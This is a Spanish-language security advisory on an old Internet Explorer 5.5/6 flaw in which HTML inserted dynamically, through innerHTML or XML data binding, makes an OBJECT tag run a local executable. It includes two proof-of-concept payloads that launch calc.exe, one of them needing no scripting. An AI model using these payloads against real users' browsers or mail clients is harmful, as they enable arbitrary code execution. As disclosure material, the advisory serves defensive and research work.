Internet Explorer: Ejecución de código arbitrario sin ActiveX
   
     [Descripción]
   
        En Junio del 2002 se publicó un artículo titulado "The Pull", el cual demostraba como era posible aprovechar
        una vieja vulnerabilidad, descubierta inicialmente por Dildog, que ejecutaba código arbitrario mediante
        el elemento object de HTML.

        A pesar de lo fascinante que había resultado el artículo, éste no estaba totalmente en lo cierto,
        afirmaba que el problema estaba ligado directamente con el objeto popup, cuando en realidad el problema
        se encontraba dinamicamente en con cualquier fragmento de HTML.

        El método createPopup crea una nueva ventana vacía que en sí no plantea ninguna amenaza, en cambio,
        mediante el método innerHTML es posible inyectar código en esta ventana vacía, y he aquí donde
        se plantea el problema real.

       <span id="oSpan"></span>
        <script language="jscript" defer>
                oSpan.innerHTML='<object
                classid="clsid:11111111-1111-1111-1111-111111111111"
                codebase="c:/windows/system32/calc.exe"></object>';
        </script>

        Nota: innerHTML no es la única propiedad usada dinamicamente para insertar HTML.

        Una vez identificado el origen del problema es posible iniciar la búsqueda de nuevas maneras para insertar
        HTML dinamicamente sin usar ningún lenguaje de escritura (scripting) en la página Web, ampliando así el
        alcance de la explotación ante productos "protegidos" cómo Microsoft Outlook o Internet Explorer
        con ActiveX inhabilitado.

        En el siguiente ejemplo se realizará la explotación de la vulnerabilidad usando XML, sin la necesidad de
        realizar peticiones externas que podrían detener la ejecución del código en pleno proceso.

        <span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
         <xml id="oExec">
                <security>
                        <exploit>
                                <![CDATA[
                                <object id="oFile"
                                classid="clsid:11111111-1111-1111-1111-111111111111"
                                codebase="c:/windows/system32/calc.exe"></object>
                                ]]>
                        </exploit>
                </security>
        </xml>


     [Versiones afectadas]
        - Internet Explorer 5.5 (Windows 98)
        - Internet Explorer 5.5 (Windows NT4)
        - Internet Explorer 6 (Windows 2000)
        - Internet Explorer 6 (Windows XP)
      
     [Enlaces]

        - Advisory: http://www.greymagic.com/security/advisories/gm001-ie